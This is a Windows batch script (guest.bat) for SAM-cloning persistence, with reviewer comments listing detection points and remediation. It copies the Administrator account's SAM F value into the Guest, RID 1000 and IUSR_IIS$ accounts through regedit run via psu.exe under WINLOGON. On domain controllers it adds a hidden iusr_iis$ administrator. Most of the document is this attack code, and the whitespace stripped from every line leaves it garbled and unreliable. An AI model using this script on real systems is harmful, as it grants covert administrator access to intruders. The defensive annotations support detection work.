@echoguest.bat^<zpid^>^<password^>
@echo__________________________________________________________
@rem NOTE(review): SAM-cloning persistence script. The page it was copied from stripped
@rem the whitespace between tokens, so this listing is not runnable as shown.
@rem What it does: copies the built-in Administrator user subkey's F value (the 1F4 key,
@rem RID 500) into the Guest subkey (1F5, RID 501) and the 3E8 subkey (RID 1000), and,
@rem where an IUSR_IIS$ account is found, into that account's subkey too, so that those
@rem accounts inherit Administrator's identity. The registry export/import is done by
@rem running regedit.exe through psu.exe with WINLOGON's PID, i.e. in an already
@rem privileged context -- this is persistence on a host the operator already controls,
@rem not an escalation by itself.
@rem Detection points (all visible below): writes to HKLM\SAM\SAM\Domains\Account\Users\*
@rem subkeys; regedit.exe launched with the export (-e) and silent import (-s) switches
@rem from a non-interactive parent; back-to-back /active:yes then /active:no toggles of
@rem Guest and TsInternetUser (account enabled/disabled audit events); and the dropped
@rem files admin.reg, name.$$$, admg.reg, admt.reg, admiis.reg, admg.bak and admt.bak
@rem (the .bak copies are given +r +s attributes). Remediation: verify every SAM user
@rem subkey's F value against the account's expected RID, disable Guest, and remove
@rem any IUSR_IIS$ / tsinternetuser accounts that are not legitimately needed.
@rem This guest.bat automatically clones Guest into the administrators group.
@rem If USERNAME is set, the bat is running under a terminal (interactive) logon; the pid value must be entered by hand.
@rem Best to change the password manually first, then run this program twice. Mainly there is no concealment; regedit is slow.
@rem Save the caller's PATH and CWD (restored at :END1) and add the Windows dirs so the helper tools resolve.
@setzpath=%path%
@setzcd=%cd%
@setpath=%path%;%windir%;%windir%system32
:start
@rem On a domain controller the SAM clone is skipped; :DOMAIN adds an admin user with net commands instead.
@rem If USERNAME is set the script assumes an interactive/terminal logon and takes the WINLOGON PID from %1 (:Term).
@netuserguest|find/i"*Domain"&&echoDomainController,Dontclone.ADDuser!&&gotoDOMAIN
@ifNOT"%USERNAME%"==""echousername=[%username%],term_loginmode.inputPID.&&gotoTerm
:start1
@rem Non-interactive path: locate WINLOGON.exe with pulist.exe and pull its PID into zpid.
@rem setx.exe -f/-a here appears to be setx's file-extraction mode (/F file /A line,token); confirm, it is not the usual env-var use.
@pulist.exe|findstr.exe/i"WINLOGON.exe">a
@setx.exea-fa-a0,1>b
@FOR/F"eol=;tokens=1,2,3*delims=,"%%iin(b)do@setzpid=%%i
@gotoAUTO
:Term
@rem Interactive path: %1 = WINLOGON PID (required), %2 = optional new password applied to Guest and, if present, TsInternetUser.
@if"%1"==""gotoUSAGE
@ifNOT"%2"==""netuserguest%2
@ifNOT"%2"==""netuser|find/i"tsinternetuser">nul&&netusertsinternetuser%2
@setzpid=%1
:AUTO
@rem Export the Administrator subkey (admin.reg) and the Users\Names subkey (name.$$$) via regedit run through psu.exe.
@rem psu.exe -i %zpid% appears to run the command in the context of that process (WINLOGON); confirm against the tool's docs.
@echoMakeadmg.regadmt.regadmiis.reg
@psu.exe-p"%windir%regedit.exe-eadmin.regHKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4"-i%zpid%>nul
@psu.exe-p"%windir%regedit.exe-ename.$$$HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames"-i%zpid%>nul
@rem Build admg.reg (target: Guest subkey 1F5) and admt.reg (target: subkey 3E8) with a regedit header each.
@echoWindowsRegistryEditorVersion5.00>admg.reg
@echoWindowsRegistryEditorVersion5.00>admt.reg
@echo[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F5]>>admg.reg
@echo[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003e8]>>admt.reg
@rem regedit exports Unicode; 'type' into a new file yields ANSI so find/setx can read it (the echo line says exactly that).
@typeadmin.reg>a&echo"Unicode-->>>ansi.find.exeuseitansi."&ifexistbdelb
@rem Reassemble the Administrator F value: fixed prefix line, then the remaining hex lines extracted from the export.
@echo"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,>>b
@setx.exea-fa-a4,0|find",">>b
@setx.exea-fa-a5,0|find",">>b
@setx.exea-fa-a6,0|find",">>b
@typeb>>admg.reg
@typeb>>admt.reg
:IIS
@rem Optional third target: if an IUSR_IIS$ account exists, find which line of the Names export it is on (zda)
@rem and derive its RID subkey name (zdd); admiis.reg is admg.reg with "1f5" replaced by that RID.
@setzda=no
@echoiusr_iisexec
@typename.$$$>name.reg
@copyname.regname.txt>nul
@FOR/L%%iIN(5,3,30)DO@(setx.exea-fname.reg-a%%i,0|find/i"IUSR_IIS$"&&setzda=%%i)
@if"%zda%"=="no"gotoPSU
@rep.exe"IUSR_IIS$"name.txt/R/I>nul
@rep.exe"Editor"name.txt/R/I>nul
@find.exe/v/n""name.txt>n1
@findstr/I"%zda%"n1>name.iis
@setxa-fname.iis-a0,1-d()>zdc
@deln1
@delname.iis
@delname.$$$
@delname.txt
@dela
@delb
@For/F"tokens=1,2*delims="%%iin(zdc)do@(echo%%i>zdd)
@For/F"tokens=1,2*delims="%%iin(zdd)do@(setzdd=%%i)
@copyadmg.regadmiis.reg>nul
@echorep.exe"1f5""%zdd%"admiis.reg/I
@rep.exe"1f5""%zdd%"admiis.reg/I
@delzdc
@delzdd
:PSU
@rem Import phase. The .bak files are previous-run copies kept read-only+system; they are swapped in before import,
@rem which is presumably why the header comment says to run the script twice (first run only produces the .bak) -- confirm.
@attrib-s-radmg.bak>nul
@attrib-s-radmt.bak>nul
@copyadmg.bakadmg.reg>nul
@copyadmt.bakadmt.reg>nul
@rem Silent import of each .reg into the SAM hive, again via psu.exe in WINLOGON's context.
@psu.exe-p"%windir%regedit.exe-sadmg.reg"-i%zpid%>nul
@psu.exe-p"%windir%regedit.exe-sadmt.reg"-i%zpid%>nul
@ifNOT"%zda%"=="no"psu.exe-p"%windir%regedit.exe-sadmiis.reg"-i%zpid%>nul
@rem Each affected account is enabled then immediately disabled again; the net effect is to leave it disabled
@rem while (presumably) forcing the SAM change to be picked up. These paired toggles are an auditable signature.
@ifNOT"%zda%"=="no"netuseriusr_iis$/active:yes>nul
@ifNOT"%zda%"=="no"netuseriusr_iis$/active:no>nul
@rem Keep the generated .reg files as hidden-ish .bak copies (+r +s) for the next run.
@copyadmg.regadmg.bak>nul
@copyadmt.regadmt.bak>nul
@attribadmg.bak+r+s>nul
@attribadmt.bak+r+s>nul
@netuserguest/active:yes>nul
@netuserguest/active:no>nul
@netuser|find/I"tsinternetuser"||gotoNEXT
@netusertsinternetuser/active:yes>nul
@netusertsinternetuser/active:no>nul
@rem Remove the working .reg files; note admiis.reg, admg.bak and admt.bak are left on disk.
@ifexistadmin.regdeladmin.reg/f>nul
@ifexistadmg.regdeladmg.reg/f>nul
@ifexistadmt.regdeladmt.reg/f>nul
:Next
@gotoend
:DOMAIN
@rem Domain-controller branch: no SAM edit; creates iusr_iis$ with password %2 and adds it to Administrators
@rem (account-created / group-membership-changed audit events apply here).
@remadduseriusr_iis$
@if"%2"==""echo"notinputguestofpassword"&&gotoEND
@netuser|find/i"iusr_iis">nul||netuseriusr_iis$%2/add
@netlocalgroupadministrators|find/i"iusr_iis$">nul||netlocalgroupadministratorsiusr_iis$/add
@gotoEND
:USAGE
@rem Prints the current WINLOGON/explorer PIDs so the caller can pass the right one as %1.
@pulist.exe|findstr.exe/i"WINLOGONexplorer"
@echo"system.batzpid<password>"
@echo"NeedcurwinlogonPID,Term_mode,MustthisTerm_login_winlogon_pid."
@gotoend1
:END
@rem Show the resulting Administrators membership.
@echo________ALLUserINadministrators:
@netlocalgroupadministrators
:END1
@rem Echo the import command for reference, restore PATH, and clear the script's variables
@rem (zdb is cleared here but is never set anywhere above; zcd is saved but never used to cd back).
@echopsu.exe-p"%windir%regedit.exe-sadmiis.reg"-i%zpid%
@setpath=%zpath%
@setzpath=
@setzcd=
@setzda=
@setzdb=
@setzdd=
@setzpid=